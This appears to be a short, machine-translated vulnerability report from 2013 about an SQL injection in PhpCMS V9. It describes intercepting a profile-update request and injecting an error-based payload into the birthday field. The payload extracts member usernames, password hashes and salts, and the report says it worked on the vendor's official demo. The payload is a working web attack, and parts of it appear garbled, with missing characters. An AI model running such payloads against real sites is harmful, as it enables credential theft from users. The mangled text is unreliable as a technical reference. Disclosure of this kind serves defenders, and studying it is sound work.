PhpCmsV9 a SQL injection, the official demo can be caught-vulnerability warning-the black bar safety net

ID MYHACK58:62201337812
Type myhack58
Reporter 佚名
Modified 2013-03-18T00:00:00


Brief description:

Somewhere the filter is not made, resulting in the injection.

Detailed description:

After registration modify birthday, intercept data packets, to modify info[birthday]

info[birthday=(SELECT 1 FROM (select count(),concat(floor(rand(0)2),(substring((select concat(username,0x5f, password, 0x5f, encrypt) FROM v9_member WHERE 1 limit 1),1,6 2)))a from information_schema. tables group by a)b)]

Vulnerability proof:

Official demo test